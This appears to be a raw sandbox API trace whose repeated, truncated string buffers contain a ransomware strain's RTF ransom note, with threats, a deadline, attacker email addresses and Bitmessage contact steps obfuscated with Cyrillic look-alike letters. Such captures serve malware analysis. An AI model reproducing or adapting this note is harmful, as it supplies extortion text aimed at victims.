INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0262.858] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0262.858] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 